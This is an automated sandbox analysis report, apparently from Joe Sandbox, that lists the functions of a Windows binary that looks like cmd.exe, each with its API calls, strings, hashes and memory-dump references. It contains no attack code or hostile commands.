String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
API String ID: 55602301-2548490036
Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
Instruction ID: 635e49bf972dad7b3a6394bbd817fc767bdf94a767e3966d1db3a32fd8307c9a
Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
Instruction Fuzzy Hash: EBA1CA76A18742E6EB10AB10E4502B9F7A5FB44765FE00179DA4E03E94EFBCE549C730

Function 00007FF782401538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF782401408: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF78240142A
Part of subcall function 00007FF782401408: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF78240144F

Part of subcall function 00007FF782401408: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF78240146C

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7824015A8
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7824015D1
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF78240160B
RtlDosPathNameToNtPathName_U.NTDLL ref: 00007FF782401635
memset.MSVCRT ref: 00007FF782401677
memmove.MSVCRT ref: 00007FF7824016AD
memmove.MSVCRT ref: 00007FF7824016E6
NtFsControlFile.NTDLL ref: 00007FF78240171D
RtlNtStatusToDosError.NTDLL ref: 00007FF78240172F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF78240173D
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF782401754
RtlFreeHeap.NTDLL ref: 00007FF78240177F
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401797

Part of subcall function 00007FF782401A40: memset.MSVCRT ref: 00007FF782401AA6
Part of subcall function 00007FF782401A40: memset.MSVCRT ref: 00007FF782401ACC
Part of subcall function 00007FF782401A40: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401B3E
Part of subcall function 00007FF782401A40: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401B67
Part of subcall function 00007FF782401A40: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF782401BD7
Part of subcall function 00007FF782401A40: _wcsicmp.MSVCRT ref: 00007FF782401C05

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
String ID:
API String ID: 3935429995-0
Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
Instruction ID: 26e90170ca5d087d661979726cc806109d4d9a88d1574ea29b279d86d723696f
Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
Instruction Fuzzy Hash: 3E61C226A18A52C6E790AF22A404579FBA0FF89F56FA58135DE4F43750DFBCD881C720

Function 00007FF7823D35B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON

Download Yara Rule

APIs

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D3620

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
Instruction ID: e627abeea9754e155e30ef84e43c5f113da32430a78ca2d7823b4ac0f3d0a939
Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
Instruction Fuzzy Hash: 8F91073270868186EF65AF25E4243FCBAA0FB44746FA04179DA8E47B94DF7CD444C320

Function 00007FF7823DB0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823DB13F

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

_get_osfhandle.MSVCRT ref: 00007FF7823DB22A
_get_osfhandle.MSVCRT ref: 00007FF7823DB241

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823DB2F7

Strings

DPATH, xrefs: 00007FF7823EC078

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _get_osfhandlememset$wcschr
String ID: DPATH
API String ID: 3260997497-2010427443
Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
Instruction ID: 8092eaa2e293aba69601c2bf676392a1cca870895dbee71ac8193f0f4a170218
Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
Instruction Fuzzy Hash: 6FD1E476A0864292EB20BB21D4242BDA3A1FF44B96FA44279D91D47FD4DFBCE845C360

Function 00007FF7823E7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00007FF7823E802B
NtOpenFile.NTDLL ref: 00007FF7823E8092
RtlReleaseRelativeName.NTDLL ref: 00007FF7823E80A4
RtlFreeUnicodeString.NTDLL ref: 00007FF7823E80B4

Part of subcall function 00007FF7823E8114: NtQueryVolumeInformationFile.NTDLL ref: 00007FF7823E8151

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E80E2
NtSetInformationFile.NTDLL ref: 00007FF7823F0327
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F0342
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F0356

Strings

@P, xrefs: 00007FF7823E805E

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
String ID: @P
API String ID: 1801357106-3670739982
Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
Instruction ID: 1c6b5600da51185aa26a912f01a0e7fcf59bfadc6024babe589057a24df95dcd
Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
Instruction Fuzzy Hash: 9E417D32B04A41DBE710AF65E4503EDBBA0FB89749F948275DA0D43A98DFB8D948C760

Function 00007FF7823D2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D2287
memset.MSVCRT ref: 00007FF7823D22AD
memset.MSVCRT ref: 00007FF7823D22D3
memset.MSVCRT ref: 00007FF7823D22F9

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D23F6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D2415
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D2434
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D2453

Part of subcall function 00007FF7823D2618: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00008000,00007FF7823D2397), ref: 00007FF7823D2666

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$BufferConsoleInfoScreen
String ID:
API String ID: 1034426908-0
Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
Instruction ID: 317f39b9dbddab131e93e65f8fa3843e261fadb0828b2fed1753800c3bf3156a
Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
Instruction Fuzzy Hash: 5AF1E432B087828AEB60EF21D8642F9B7A0FF45785FA04179DA4E47A95DF7CE544C710

Function 00007FF7823FAC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAD67
RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FADF0
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAE17
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAE94
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAED1
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAEFA

Strings

\Shell\Open\Command, xrefs: 00007FF7823FAD12
%s=%s, xrefs: 00007FF7823FAEA9

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseValue$CreateDeleteOpen
String ID: %s=%s$\Shell\Open\Command
API String ID: 4081037667-3301834661
Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
Instruction ID: ccc4256d750c48dd094ab9b346a83ff16386f3306877bb05742433e2049077e4
Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
Instruction Fuzzy Hash: EE71D762B0974282EF50AB15F4602B9E6A1FF44B82FE44179DE8E07B94DFBCD845C720

Function 00007FF7823FAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAA85
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAACF
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FAAEC
RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FAB39
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FAB6F
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FABA4
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7823F98C0), ref: 00007FF7823FABCB

Strings

%s=%s, xrefs: 00007FF7823FAB02

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseDeleteValue$CreateOpen
String ID: %s=%s
API String ID: 1019019434-1087296587
Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
Instruction ID: fad04ca696c137d4cc7ab6ff5ac33c0176e46f4f7bfe1f923db6f1f69e9dabe0
Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
Instruction Fuzzy Hash: D751AA31B0879186E760AB65E45477AFBE1FB89742FA04178CE4D43B94DFB8D845CB10

Function 00007FF7823D1884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF7823D194E
_wcsnicmp.MSVCRT ref: 00007FF7823D19A1
wcsrchr.MSVCRT ref: 00007FF7823D1A1D
_wcsnicmp.MSVCRT ref: 00007FF7823D1A75

Strings

COPYCMD, xrefs: 00007FF7823D192B, 00007FF7823D19F9

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmpwcsrchr
String ID: COPYCMD
API String ID: 2429825313-3727491224
Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
Instruction ID: b4e5a07742cb1dbaa6c7fe22f2cf61b388d2a572d9396e0ce1e72b2aee086b19
Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
Instruction Fuzzy Hash: EEF1C432F0860286FB61AF55A0641BDB6F1BB0479AFA04179DE5D23ED8DFBCA444C760

Function 00007FF7823D4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D4A87

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

wcsrchr.MSVCRT ref: 00007FF7823D4B19
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D4B83
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D4BDD

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$FullNamePathwcsrchr
String ID:
API String ID: 4289998964-0
Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
Instruction ID: 60d368dba8c772bdf9a909bcffed1c61ed65b43792e3b2ea40dc821befecb567
Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
Instruction Fuzzy Hash: 6BC1F615B09346C2EE94BB51B168378A3A0FB54B92FA05579CE0E17FD0DFBCA895C320

Function 00007FF7823FBCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7823FBD2C
fflush.MSVCRT ref: 00007FF7823FBD45
TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823FBD62
NtCancelSynchronousIoFile.NTDLL ref: 00007FF7823FBD80
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823FBD93
_get_osfhandle.MSVCRT ref: 00007FF7823FBDB5
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FBDC4

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
String ID:
API String ID: 3476366620-0
Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
Instruction ID: 2e3c01122cf87f04778fb62425937eed62cd2e16eb7f3f031643a1dd1a932219
Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
Instruction Fuzzy Hash: 2A21746190854392EA547B11E4252B8EB51FF49717FE0427AD41E036E1DFBCA848C331

Function 00007FF7823E9584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823E95B4
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E95C2
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E95CE
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823E95DA
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823E95EA
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 00007FF7823E9605

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
Instruction ID: 4274f12c5ddd4d123d8019617cbabd49339a9579317d70ea70936df20e286bc3
Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
Instruction Fuzzy Hash: 0E119322A04F418AEB40EF71E8442A877A4FB09759F900A34EA6D47B54DFBCD9A4C360

Function 00007FF7823D3D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

_setjmp.MSVCRT ref: 00007FF7823D3DD4

Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD

Part of subcall function 00007FF7823D1884: wcsrchr.MSVCRT ref: 00007FF7823D194E
Part of subcall function 00007FF7823D1884: _wcsnicmp.MSVCRT ref: 00007FF7823D19A1

NtQueryInformationProcess.NTDLL ref: 00007FF7823D3E9C
NtSetInformationProcess.NTDLL ref: 00007FF7823D3EC9
NtSetInformationProcess.NTDLL ref: 00007FF7823D3F4D

Strings

%9d, xrefs: 00007FF7823D3EF9

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
String ID: %9d
API String ID: 1006866328-2241623522
Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
Instruction ID: 8adb73c3756b22813a21425d74b78fedd7a590b27422a0c7a0cd13fe9fa6f506
Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
Instruction Fuzzy Hash: A3518572A046428AF700EF11E8541A8BBB4FB44795FA04679DA6D53BD1CFBCE944CB70

Function 00007FF7823D8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D8E6D
memset.MSVCRT ref: 00007FF7823D8E93

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D8F9A
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D8FBC

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
Instruction ID: c3bc9d88d45c99667406db6df24adc5ee22c857c56fdbcb05505f5d129fb1c0d
Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
Instruction Fuzzy Hash: 7EC14762A0878296EB61EB20E864AF9A3A4FF94745FA44179DA0D07FD0DF7CE545C320

